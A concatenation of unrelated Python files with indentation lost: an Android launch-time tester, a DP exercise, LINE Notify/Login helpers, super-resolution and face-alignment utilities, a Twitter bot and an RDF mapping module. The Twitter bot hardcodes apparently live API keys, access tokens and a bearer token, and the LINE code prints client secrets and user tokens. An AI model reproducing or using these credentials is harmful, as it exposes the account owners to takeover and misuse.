self.json_file_name = "start_time_baidu.json"
self.model_code = 4
self.tmp_pic_dir = TMP_IMG_BAIDU_DIR
# if os.path.exists(self.tmp_pic_dir):
# shutil.rmtree(self.tmp_pic_dir)
QueueManager.register('get_task_status', callable=lambda : self.task_pid_status)
QueueManager.register('get_answer_queue', callable=lambda: self.answer_queue)
QueueManager.register('get_msg_queue', callable=lambda : self.msg_queue)
self.manager = QueueManager(address=('localhost', QueueManager.SHARED_PORT), authkey=b'1234')
self.manager.start()
self.shared_task_status_dt = self.manager.get_task_status()
self.shared_answer_queue = self.manager.get_answer_queue()
self.shared_msg_queue = self.manager.get_msg_queue()
def _get_apk_info(self):
data = self.android.get_aapt_data()
print('data : ' + data)
for line in data.split("\n"):
if line.startswith("package:"):
for word in line.split(" "):
if "=" in word:
word = word.replace("'", "")
self.apk_info[word.split("=")[0]] = word.split("=")[1]
def _get_time_stamp(self, filename):
fn, ext = os.path.splitext(filename)
d = datetime.datetime.strptime(fn, "%Y-%m-%d_%H-%M-%S-%f")
ts = datetime.datetime.timestamp(d)
return ts
def _dispatch_cal_task(self):
capture_path = os.path.abspath(os.path.join(self.tmp_pic_dir, os.pardir))
fp = open(os.path.join(capture_path, self.json_file_name))
self.start_dt = json.load(fp)
screenshots_dir = os.path.join(self.tmp_pic_dir, self.platform)
ls = os.listdir(screenshots_dir)
times_list = [int(name) for name in ls if not name.startswith(".")]
times_list.sort()
i = 0
flag_1 = False
flag_2 = False
# length = len(times_list)
length = self.test_count
finished_list = []
while i < length:
if not flag_1:
str_time_list_i = str(times_list[i])
pictures_dir_1 = os.path.join(screenshots_dir, str_time_list_i)
task_process_1 = Process(target=self._cal_time, args=(pictures_dir_1, str_time_list_i, self.start_dt[str_time_list_i], self.model_code))
task_process_1.start()
self.shared_task_status_dt.setdefault(task_process_1.pid, False)
flag_1 = True
i += 1
if not flag_2 and i < length:
str_time_list_i = str(times_list[i])
pictures_dir_2 = os.path.join(screenshots_dir, str_time_list_i)
task_process_2 = Process(target=self._cal_time, args=(pictures_dir_2, str_time_list_i, self.start_dt[str_time_list_i], self.model_code))
task_process_2.start()
self.shared_task_status_dt.setdefault(task_process_2.pid, False)
flag_2 = True
i += 1
status1 = self.shared_task_status_dt.get(task_process_1.pid)
if status1 and task_process_1.pid not in finished_list:
finished_list.append(task_process_1.pid)
flag_1 = False
status2 = self.shared_task_status_dt.get(task_process_2.pid)
if status2 and task_process_2.pid not in finished_list:
finished_list.append(task_process_2.pid)
flag_2 = False
while True:
is_all_finished = True
for status in self.shared_task_status_dt.values():
is_all_finished = is_all_finished and status
if is_all_finished:
break
print()
print('#######################')
print()
# 取 12 组数据,最终结果去掉一个最小值和一个最大值,再计算平均值
launch_time_ls = []
loading_time_ls = []
while True:
try:
data = self.shared_answer_queue.get_nowait()
msg = json.loads(data)
dirname = msg['dirname']
summary = msg['summary']
info = msg['info']
total_time = msg['total_time']
launch_time = msg['result']['launch_time']
loading_time = msg['result']['home_page_loading_time']
print("文件夹:%s" % dirname)
print("\t%s" % summary)
print("\t%s" % info)
print("\t%s" % (total_time))
print("\tApp 启动时长:%.3fs" % (launch_time))
# print("\tApp 启动时长:%.3fs App 首页加载时长:%.3fs" % (launch_time, loading_time))
print('#######################')
print()
if launch_time > 0:
launch_time_ls.append(int(launch_time * 1000))
if loading_time > 0:
loading_time_ls.append(int(loading_time * 1000))
except queue.Empty:
break
launch_time_ls.sort()
loading_time_ls.sort()
len1 = len(launch_time_ls)
len2 = len(loading_time_ls)
if len1 > 2:
aver_launch_time = 1.0 * sum(launch_time_ls[1:-1]) / (len1 - 2)
else:
aver_launch_time = 0
if len2 > 2:
aver_home_page_loading_time = 1.0 * sum(loading_time_ls[1:-1]) / (len2 - 2)
else:
aver_home_page_loading_time = 0
aver_launch_time /= 1000
aver_home_page_loading_time /= 1000
str_aver = "%s App 的平均启动时长:%.3fs" % (self.app_name, aver_launch_time)
# str_aver = "平均启动时长:%.3fs 平均加载时长: %.3fs" % (aver_launch_time, aver_home_page_loading_time)
print(str_aver)
def parse_data(self, msg_data):
msg = json.loads(msg_data)
def _cal_time(self, pic_dir, times_counter, start_time, model_code):
ct = CalTime(times_counter, model_code)
ct.cal_time(pic_dir, EXCLUDED_LIST, start_time)
def capture_pic(self):
# 前 4 次不计入启动,出现广告概率较高
for times in range(4):
self.android.start_app(self.package_name, self.activity_name)
time.sleep(12)
self.android.kill_app(self.package_name)
time.sleep(5)
self.minicap = MinicapStream(port=QueueManager.MINICAP_PORT, model_code=self.model_code)
self.minicap.run()
for times in range(self.test_count):
self.shared_msg_queue.put(times + 1)
# 启动 LauncherActivity
print('正在启动 MainActivity 进行测试...')
p_am = self.android.adb([
'shell', 'am', 'start', '-W', '-n', '%s/%s' % (self.package_name, self.activity_name)
], stdout=PIPE)
self.start_time = time.time()
self.start_dt[times + 1] = self.start_time
# 等待 MainActivity 启动完毕
while p_am.poll() is None:
time.sleep(0.1)
time.sleep(15)
self.android.kill_app(self.package_name)
time.sleep(5)
#准备开始下一次截图
self.shared_msg_queue.put(-1)
# 关闭连接 minicap 的套接字
self.shared_msg_queue.put(-2)
# 保存 每次的 start time
fp = os.path.join(os.path.join(self.tmp_pic_dir, os.pardir), self.json_file_name)
with open(fp, "w") as fobj:
json.dump(self.start_dt, fobj)
def test(self):
# 先捕获图片
if self.need_screenshot == 1:
self.capture_pic()
# 不管有几个文件夹,每次都只跑两个进程
if self.need_test == 1:
self._dispatch_cal_task()
def query_service(port):
fobj = os.popen("lsof -i tcp:%d" % port)
state = fobj.read().strip()
if len(state) == 0:
return False, -1
ls = state.split("\n")
status_list = ls[-1].split()
status = status_list[-1]
pid = status_list[1]
return status == "(LISTEN)", pid
def close_shared_server():
state, pid = query_service(QueueManager.SHARED_PORT)
if pid != -1:
os.system("kill %s" % pid)
if __name__ == '__main__':
try:
test_counter = 10
device_id = os.popen("adb shell getprop ro.serialno").read().strip()
package_name = "com.zhihu.android"
activity_name = ".app.ui.activity.LauncherActivity"
# print(device_id)
at = AndroidTester(10, "Android", device_id, package_name, activity_name, cal_mode="2")
# at.capture_pic()
at._dispatch_cal_task()
finally:
close_shared_server()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ----------------------------------
# @Date : 2020/4/6
# @Author : Zhicheng Qian
# @Version : 1.0
# @Brief :
# @Description :
# @Reference :
# ----------------------------------
class T:
def __init__(self, LL):
self.dp = [[-1] * len(l) for l in LL]
def recur(self, LL, i, j, n):
if j == n:
self.dp[i][j] = 0
return self.dp[i][j]
dp0 = self.dp[0][j + 1] if self.dp[0][j + 1] > 0 else self.recur(LL, 0, j + 1, n)
dp1 = self.dp[1][j + 1] if self.dp[1][j + 1] > 0 else self.recur(LL, 1, j + 1, n)
dp2 = self.dp[2][j + 1] if self.dp[2][j + 1] > 0 else self.recur(LL, 2, j + 1, n)
self.dp[i][j] = min(
[
dp0 + abs(LL[0][j + 1] - LL[i][j]),
dp1 + abs(LL[1][j + 1] - LL[i][j]),
dp2 + abs(LL[2][j + 1] - LL[i][j]),
])
return self.dp[i][j]
def test(self, LL):
n = len(LL[0]) - 1
return min([self.recur(LL, 0, 0, n), self.recur(LL, 1, 0, n), self.recur(LL, 2, 0, n)])
if __name__ == '__main__':
# LL = [[1, 3, 6], [2, 4, 7], [3, 5, 10]]
LL = [[1, 6, 12], [2, 8, 20], [3, 9, 30]]
tt = T(LL)
ret = tt.test(LL)
print(ret)
|
class AuthToken:
tokens: list
current_token = 0
def __init__(self, tokens: list) -> None:
self.tokens = ['Bearer {}'.format(token)
for token in tokens]
def next_token(self):
if self.current_token < len(self.tokens) - 1:
self.current_token += 1
else:
self.current_token = 0
def get_token(self) -> str: return self.tokens[self.current_token]
|
# -*- coding: utf8 -*-
import requests
from models import oper_para
from django.contrib.auth.models import User
from models import LineUserInfo
def GetToken(code):
import json
client_id = oper_para.objects.get(name='client_id')
client_secret = oper_para.objects.get(name = 'client_secret')
redirect_uri = oper_para.objects.get(name = 'redirect_uri')
print "code:" + code
print "client_id:" + client_id.content
print "client_secret:" + client_secret.content
r = requests.post("https://notify-bot.line.me/oauth/token",
data={
"grant_type":"authorization_code",
"code":code,
"redirect_uri":redirect_uri.content,
"client_id":client_id.content,
"client_secret":client_secret.content
},
headers={
"Content-Type":"application/x-www-form-urlencoded"
}
)
print r.text.encode('utf-8')
return r.text
def GetLoginToken(code):
def GetLineProfile(token):
r = requests.post("https://api.line.me/v2/profile",
headers=
{
"Authorization":"Bearer " + token,
"Content-Type":"application/x-www-form-urlencoded"
}
)
print r.text.encode('utf-8')
return r.text
import json
channel_id = oper_para.objects.get(name = 'login_client_id')
client_secret = oper_para.objects.get(name = 'login_client_secret')
redirect_uri = oper_para.objects.get(name = 'login_redirect_uri')
#https://api.line.me/v2/oauth/accesstoken
r = requests.post("https://api.line.me/v2/oauth/accessToken",
data={
"grant_type":"authorization_code",
"client_id":channel_id.content,
"client_secret":client_secret.content,
"code":code,
"redirect_uri":redirect_uri.content
},
headers={
"Content-Type":"application/x-www-form-urlencoded"
}
)
print r.text.encode('utf-8')
jsont = json.loads(r.text)
r=GetLineProfile(jsont['access_token'])
jsonr = json.loads(r)
mid = jsonr['userId']
mName = jsonr['displayName']
mpictureUrl = jsonr['pictureUrl']
print 'mid:' + mid
print 'displayName:' + mName.encode('utf-8')
print 'pictureUrl:' + mpictureUrl
return mid, mName, mpictureUrl
def GetLineNotifyUrl(vemail):
client_id = oper_para.objects.get(name='client_id')
redirect_uri = oper_para.objects.get(name = 'redirect_uri')
URL = 'https://notify-bot.line.me/oauth/authorize?'
URL += 'response_type=code'
URL += '&client_id=' + client_id.content
URL += '&redirect_uri=' + redirect_uri.content
URL += '&scope=notify'
URL += '&state=abcde'
print URL
return URL
def sendmsg(vuser= User,msg = ''):
print "token:" + vuser.lineuserinfo.token
r = requests.post("https://notify-api.line.me/api/notify",
data={
"message":msg
},
headers=
{
"Authorization":"Bearer " + vuser.lineuserinfo.token,
"Content-Type":"application/x-www-form-urlencoded"
}
)
LU = LineUserInfo.objects.get(user = vuser)
cnt = LU.msgcnt
cnt = cnt + 1
LU.msgcnt = cnt
LU.token = vuser.lineuserinfo.token
LU.save()
print r.text.encode('utf-8')
return r.text
def sendgmail():
import smtplib
gu = oper_para.objects.get(name='gu')
gp = oper_para.objects.get(name='gp')
gmail_user = gu.content
gmail_pwd = gp.content
FROM = 'tiomor4n@gmail.com'
TO = 'tiomor4n@gmail.com'
SUBJECT = 'this is subject'
TEXT = 'text'
message = """
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<table style='width:60%;margin-left:auto;margin-right:auto;'>
<tr>
<td style='background-color:green;color:#fff;padding-top:50px;padding-bottom:50px;text-align:center;'>
<p style='font-size:30px;'>This is sample html email</p>
<a href='http://www.techipapa.blogspot.com/' style='color:#fff;text-decoration:none;font-size:35px;'>Click here</a>
</td>
</tr>
</table>
</body>
</html>
"""
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(gmail_user, gmail_pwd)
server.sendmail(FROM, TO, message)
print "Successfully sent email"
return 'mail send'
except:
raise
print "Error: unable to send email"
return 'mail not send' |
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import cv2
from sklearn.metrics import auc
import math
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from data import common
from skimage.measure import compare_psnr, compare_ssim
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_psnr_{}.pdf'.format(d)))
plt.close(fig)
def plot_nme(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'Face Alignment on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('NME')
plt.grid(True)
plt.savefig(self.get_path('test_nme_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
# for v in save_list:
# normalized = v[0].mul(255 / self.args.rgb_range)
# tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
# self.queue.put((filename, tensor_cpu))
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def convert_rgb_to_y(tensor):
image = tensor[0].cpu().numpy().transpose(1,2,0)#.detach()
if len(image.shape) <= 2 or image.shape[2] == 1:
return image
#xform = np.array([[65.481, 128.553, 24.966]])
#y_image = image.dot(xform.T) + 16.0
xform = np.array([[65.738 / 256.0, 129.057 / 256.0, 25.064 / 256.0]])
y_image = image.dot(xform.T) + 16.0
return y_image
def calc_psnr(sr, hr, scale, rgb_range, dataset=None, facebb=[]):
# Y channel
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
shave = scale
facebb = facebb[0].numpy()
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
_, _, w, h = hr.size()
x1 = max(int(facebb[0]), shave)
x2 = min(int(facebb[2]), w-shave)
y1 = max(int(facebb[1]), shave)
y2 = min(int(facebb[3]), h-shave)
image1 = convert_rgb_to_y(sr)
image2 = convert_rgb_to_y(hr)
image1 = image1[y1:y2, x1:x2, :]
image2 = image2[y1:y2, x1:x2, :]
psnr = compare_psnr(image1, image2, data_range=rgb_range)
ssim = compare_ssim(image1, image2, win_size=11, gaussian_weights=True, multichannel=True, K1=0.01, K2=0.03,
sigma=1.5, data_range=rgb_range)
return psnr, ssim
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
# trainable = target.model.specify_parameter(args.lr, args.weight_decay)
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
kwargs_optimizer['nesterov'] = True
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
print(optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
def get_parameters(model, bias):
for m in model.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):
if bias:
yield m.bias
else:
yield m.weight
elif isinstance(m, nn.BatchNorm2d):
if bias:
yield m.bias
else:
yield m.weight
def weights_init_cpm(m):
classname = m.__class__.__name__
# print(classname)
if classname.find('Conv') != -1:
m.weight.data.normal_(0, 0.01)
if m.bias is not None: m.bias.data.zero_()
elif classname.find('BatchNorm2d') != -1:
m.weight.data.fill_(1)
m.bias.data.zero_()
def resize_bi(lr, scale, interp='INTER_CUBIC'):
im = lr.cpu().numpy()[0]
im = np.transpose(im, (1, 2, 0))
height, width = im.shape[:2]
im_bi = cv2.resize(im, (width*scale, height*scale), interpolation=cv2.INTER_CUBIC)
im_bi_tensor = np.transpose(im_bi, (2, 0, 1))
im_bi_tensor = np.expand_dims(im_bi_tensor, axis=0)
return torch.from_numpy(im_bi_tensor).cuda()
def find_tensor_peak_batch(heatmap, downsample, threshold = 0.000001):
radius = 4
assert heatmap.dim() == 3, 'The dimension of the heatmap is wrong : {}'.format(heatmap.size())
num_pts, H, W = heatmap.size(0), heatmap.size(1), heatmap.size(2)
assert W > 1 and H > 1, 'To avoid the normalization function divide zero'
# find the approximate location:
score, index = torch.max(heatmap.view(num_pts, -1), 1)
index_w = (index % W).float()
index_h = (index / W).float()
def normalize(x, L):
return -1. + 2. * x.data / (L-1)
boxes = [index_w - radius, index_h - radius, index_w + radius, index_h + radius]
boxes[0] = normalize(boxes[0], W)
boxes[1] = normalize(boxes[1], H)
boxes[2] = normalize(boxes[2], W)
boxes[3] = normalize(boxes[3], H)
#affine_parameter = [(boxes[2]-boxes[0])/2, boxes[0]*0, (boxes[2]+boxes[0])/2,
# boxes[0]*0, (boxes[3]-boxes[1])/2, (boxes[3]+boxes[1])/2]
#theta = torch.stack(affine_parameter, 1).view(num_pts, 2, 3)
affine_parameter = torch.zeros((num_pts, 2, 3))
affine_parameter[:,0,0] = (boxes[2]-boxes[0])/2
affine_parameter[:,0,2] = (boxes[2]+boxes[0])/2
affine_parameter[:,1,1] = (boxes[3]-boxes[1])/2
affine_parameter[:,1,2] = (boxes[3]+boxes[1])/2
# extract the sub-region heatmap
theta = affine_parameter.to(heatmap.device)
grid_size = torch.Size([num_pts, 1, radius*2+1, radius*2+1])
grid = F.affine_grid(theta, grid_size)
sub_feature = F.grid_sample(heatmap.unsqueeze(1), grid).squeeze(1)
sub_feature = F.threshold(sub_feature, threshold, np.finfo(float).eps)
X = torch.arange(-radius, radius+1).to(heatmap).view(1, 1, radius*2+1)
Y = torch.arange(-radius, radius+1).to(heatmap).view(1, radius*2+1, 1)
sum_region = torch.sum(sub_feature.view(num_pts,-1),1)
x = torch.sum((sub_feature*X).view(num_pts,-1),1) / sum_region + index_w
y = torch.sum((sub_feature*Y).view(num_pts,-1),1) / sum_region + index_h
x = x * downsample + downsample / 2.0 - 0.5
y = y * downsample + downsample / 2.0 - 0.5
return torch.stack([x, y],1), score
def evaluate_normalized_mean_error(predictions, groundtruth, facebb=None):
## compute total average normlized mean error
# if extra_faces is not None: assert len(extra_faces) == len(predictions), 'The length of extra_faces is not right {} vs {}'.format( len(extra_faces), len(predictions) )
# num_images = len(predictions)
# for i in range(num_images):
# c, g = predictions[i], groundtruth[i]
# error_per_image = np.zeros((num_images,1))
num_images = 1
num_points = predictions.shape[1]
error_per_image = np.zeros((1))
for i in range(num_images):
detected_points = predictions
ground_truth_points = groundtruth
if num_points == 68:
interocular_distance = np.linalg.norm(ground_truth_points[:2, 36] - ground_truth_points[:2, 45])
assert bool(ground_truth_points[2,36]) and bool(ground_truth_points[2,45])
elif num_points == 51 or num_points == 49:
interocular_distance = np.linalg.norm(ground_truth_points[:2, 19] - ground_truth_points[:2, 28])
assert bool(ground_truth_points[2,19]) and bool(ground_truth_points[2,28])
elif num_points == 19:
W = facebb[2] - facebb[0]
H = facebb[3] - facebb[1]
interocular_distance = np.sqrt(W * H)# common.faceSZ_from_pts(groundtruth) #
elif num_points == 194:
interocular_distance = common.faceSZ_from_pts(groundtruth)
else:
raise Exception('----> Unknown number of points : {}'.format(num_points))
dis_sum, pts_sum = 0, 0
for j in range(num_points):
if bool(ground_truth_points[2, j]):
dis_sum = dis_sum + np.linalg.norm(detected_points[:2, j] - ground_truth_points[:2, j])
pts_sum = pts_sum + 1
error_per_image = dis_sum / (pts_sum*interocular_distance)
# normalise_mean_error = error_per_image.mean()
normalise_mean_error = error_per_image
# calculate the auc for 0.07
max_threshold = 0.07
threshold = np.linspace(0, max_threshold, num=2000)
accuracys = np.zeros(threshold.shape)
for i in range(threshold.size):
accuracys[i] = np.sum(error_per_image < threshold[i]) * 1.0 / error_per_image.size
area_under_curve07 = auc(threshold, accuracys) / max_threshold
# calculate the auc for 0.08
max_threshold = 0.08
threshold = np.linspace(0, max_threshold, num=2000)
accuracys = np.zeros(threshold.shape)
for i in range(threshold.size):
accuracys[i] = np.sum(error_per_image < threshold[i]) * 1.0 / error_per_image.size
area_under_curve08 = auc(threshold, accuracys) / max_threshold
accuracy_under_007 = np.sum(error_per_image<0.07) * 100. / error_per_image.size
accuracy_under_008 = np.sum(error_per_image<0.08) * 100. / error_per_image.size
# print('Compute NME and AUC for {:} images with {:} points :: [(nms): mean={:.3f}, std={:.3f}], auc@0.07={:.3f}, auc@0.08-{:.3f}, acc@0.07={:.3f}, acc@0.08={:.3f}'.format(num_images, num_points, normalise_mean_error*100, error_per_image.std()*100, area_under_curve07*100, area_under_curve08*100, accuracy_under_007, accuracy_under_008))
for_pck_curve = []
for x in range(0, 3501, 1):
error_bar = x * 0.0001
accuracy = np.sum(error_per_image < error_bar) * 1.0 / error_per_image.size
for_pck_curve.append((error_bar, accuracy))
return normalise_mean_error, accuracy_under_008, for_pck_curve
def calc_nme(args, pts, batch_heatmaps, mask, hr_np, facebb, filename, sr):
argmax = 4
downsample = hr_np.shape[-1]/batch_heatmaps[0].size()[-1] #args.scale[0]
batch_size = 1
# The location of the current batch
batch_locs, batch_scos = [], []
for ibatch in range(batch_size):
batch_location, batch_score = find_tensor_peak_batch(batch_heatmaps[-1][ibatch], downsample)
batch_locs.append( batch_location )
batch_scos.append( batch_score )
batch_locs, batch_scos = torch.stack(batch_locs), torch.stack(batch_scos)
# np_batch_locs: (1, 69, 2)
np_batch_locs, np_batch_scos = batch_locs.detach().cpu().numpy(), batch_scos.detach().cpu().numpy()
for i in range(len(np_batch_locs)):
locations = np_batch_locs[ibatch,:-1,:]
scores = np.expand_dims(np_batch_scos[ibatch,:-1], -1)
prediction = np.concatenate((locations, scores), axis=1).transpose(1,0)
groundtruth = pts[i].numpy()
facebb = facebb[0].numpy()
nme, accuracy_under_008, _ = evaluate_normalized_mean_error(prediction, groundtruth, facebb)
return nme*100
|
import tweepy
creds = {
"consumer_key": "0Ex34lGWEnplcisTVzfZV5nOv",
"consumer_secret": "wcIasfkl8W8p4Haw3gvQpywKDdftKslRUf9okALfgTPjpf9hp9",
"access_token": "1459501699-7yL7Yyq9TgjIQvgomwxT0ey73LSR1zNGy1MgCWV",
"access_token_secret": "j7B1WczL0dExfO9ondn4Z61fn7hviNhTVqiZZD58VgUvS",
}
auth = tweepy.OAuthHandler(creds["consumer_key"], creds["consumer_secret"])
auth.set_access_token(creds["access_token"], creds["access_token_secret"])
api = tweepy.API(auth)
api.update_status("My_Bot_Message")
# bearer-token: AAAAAAAAAAAAAAAAAAAAAMXdUQEAAAAAekDLGTH2Nq55TzupcTlWeq4rGZU%3DZ7DvavQ1noNxWT7fW6aRTpzfOzSfVz7AFvxszXUj9MBhDa3uYj
|
__author__ = "Andrea Giovanni Nuzzolese"
__email__ = "andrea.nuzzolese@cnr.it"
__license__ = "Apache 2"
__version__ = "0.1"
__status__ = "Pre-Alpha"
from abc import ABC, abstractclassmethod
from builtins import staticmethod
import re, os, unidecode
from typing import Dict, Union, Set, List
from pandas.core.frame import DataFrame
from rdflib import URIRef, Graph, plugin
from rdflib.query import Processor, Result
from rdflib.namespace import RDF
from rdflib.plugins.sparql.processor import prepareQuery, SPARQLProcessor, SPARQLResult
from rdflib.term import Node, BNode, Literal, Identifier
from rdflib.parser import StringInputSource
import numpy as np
import pandas as pd
import pyrml.rml_vocab as rml_vocab
import sys
import multiprocessing
from multiprocessing import Pool
import logging
from lark import Lark
from lark.visitors import Transformer
from jinja2 import Environment, FileSystemLoader, Template
from jsonpath_ng import jsonpath, parse
import json
from pathlib import Path
import time
from datetime import timedelta
def graph_add_all(g1, g2):
for (s,p,o) in g2:
g1.add((s,p,o))
return g1
class TermMap(ABC):
def __init__(self, map_id: URIRef = None):
if map_id is None:
self._id = BNode()
else:
self._id = map_id
def get_id(self) -> Union[URIRef, BNode]:
return self._id
@abstractclassmethod
def get_mapped_entity(self) -> Node:
pass
@abstractclassmethod
def to_rdf(self) -> Graph:
pass
@staticmethod
@abstractclassmethod
def from_rdf(g: Graph) -> Set[object]:
pass
class Evaluable():
@abstractclassmethod
def eval(self, row, is_iri):
pass
class Funz(Evaluable):
def __init__(self, fun, args):
self.__fun = fun
self.__args = args
def eval(self, row, is_iri):
args = []
for arg in self.__args:
if isinstance(arg, str) and arg.strip() == '*':
args.append(row)
elif isinstance(arg, str):
args.append(TermUtils.replace_place_holders(arg, row, False))
else:
args.append(arg)
value = self.__fun(*args)
return TermUtils.irify(value) if is_iri else value
class String(Evaluable):
def __init__(self, string):
self.__string = string
def eval(self, row, is_iri):
return TermUtils.replace_place_holders(self.__string, row, is_iri)
def __str__(self):
return self.__string
class Expression():
def __init__(self):
self._subexprs = []
def add(self, subexpr: Evaluable):
self._subexprs.append(subexpr)
def eval(self, row, is_iri):
items = [item.eval(row, is_iri) for item in self._subexprs]
try:
value = "".join(items)
except:
print([str(item) for item in self._subexprs])
print(row)
for item in self._subexprs:
print(item.eval(row, is_iri))
raise
if value != '':
return URIRef(value) if is_iri else value
else:
return None
class AbstractMap(TermMap):
def __init__(self, map_id: URIRef = None, mapped_entity: Node = None):
super().__init__(map_id)
self._mapped_entity = mapped_entity
self._expression = Expression()
if mapped_entity is not None and isinstance(mapped_entity, str):
p = re.compile('(?<=\%eval:).+?(?=\%)')
matches = p.finditer(mapped_entity)
#s = "'{mapped_entity}'".format(mapped_entity=mapped_entity.replace("'", "\\'"))
s = mapped_entity
cursor = 0
#test = "Ciccio b'ello"
#test = "\"{t}\"".format(t=test)
out = ''
#print(eval(repr(test)))
for match in matches:
start = match.span()[0]-6
end = match.span()[1]+1
if cursor < start:
self._expression.add(String(s[cursor:start]))
#print("%d, %d"%(start, end))
function = match.group(0)
#text = "%eval:" + function + "%"
#function = TermUtils.replace_place_holders(function, row, False)
result = TermUtils.get_functions(function)
self._expression.add(Funz(result[0], result[1]))
#print(result[0], *result[1])
#result = "{fun}{params}".format(fun=result[0], params=tuple(result[1]))
#print(result)
#out += '+' + result
cursor = end
if cursor < len(s):
self._expression.add(String(s[cursor:]))
#out += '+' + s[cursor:]
#value = TermUtils.replace_place_holders(s, row, is_iri)
def get_mapped_entity(self) -> Node:
return self._mapped_entity
@abstractclassmethod
def to_rdf(self):
pass
@staticmethod
@abstractclassmethod
